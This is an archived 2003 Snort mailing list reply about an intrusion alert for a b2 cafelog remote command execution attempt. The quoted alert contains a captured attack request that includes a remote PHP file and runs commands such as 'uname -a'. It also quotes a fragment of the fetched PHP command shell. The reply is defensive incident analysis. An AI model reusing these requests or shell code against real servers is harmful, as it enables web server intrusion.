Snort mailing list archives
Re: Is it an real attack ?
From: Nigel Houghton <nigel () sourcefire com>
Date: Mon, 29 Dec 2003 12:10:09 -0600 (CST)
Around 8:52am someone said: s : 6. Is it an real attack ? (=?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?=) s : s :Message: 6 s :From: =?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?= <sama () inf ufsc br> s :To: <snort-users () lists sourceforge net> s :Date: Mon, 29 Dec 2003 04:07:57 -0800 s :Subject: [Snort-users] Is it an real attack ? s : s :Hi, s : s : Verifying the snort logs, I found the following attack: s : s :[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt s : s :000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67 GET //b2-tools/g s :010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63 m-2-b2.php?b2inc s :020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E =http://www.corn s :030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63 age.hpg.com.br/c s :040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61 md.txt??&cmd=una s :050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61 me%20-a?&cmd=una s :060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58 me%20-a;echo%20X s :070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A FTEAM HTTP/1.0.. s :080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A HOST: mysite.com- s :090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A mysite.com .... s : s :I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the s :following code: s : s :-cmd /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); s : $output = ob_get_contents(); s : ob_end_clean(); s : $output = str_replace("\n","\n-cmd ",$output); s : if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", s :$output)); s : s :?> s : s :What kind of attack is this ? Are there any place where can I find s :informations about this attack ? Always check the rule documentation first: http://www.snort.org/snort-db/sid.html?sid=2144 If you are running the cafelog application then yes, this was an attempted intrusion/attack. The attacker tried to include some code to execute on the webserver. The attacker was also trying to execute some system commands like "uname -a" to get system information as well as the command "echo". s :Thanks, s : s :Robert ----------------------------------------------------------------------- Nigel Houghton Security Research Engineer Sourcefire Inc. Vulnerability Research Team "In an emergency situation involving two or more officers of equal rank, seniority will be granted to whichever officer can program a vcr." ------------------------------------------------------- This SF.net email is sponsored by: IBM Linux Tutorials. Become an expert in LINUX or just sharpen your skills. Sign up for IBM's Free Linux Tutorials. Learn everything from the bash shell to sys admin. Click now! http://ads.osdn.com/?ad_id=1278&alloc_id=3371&op=click _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Is it an real attack ? RSA (Dec 29)
- <Possible follow-ups>
- Re: Is it an real attack ? Nigel Houghton (Dec 29)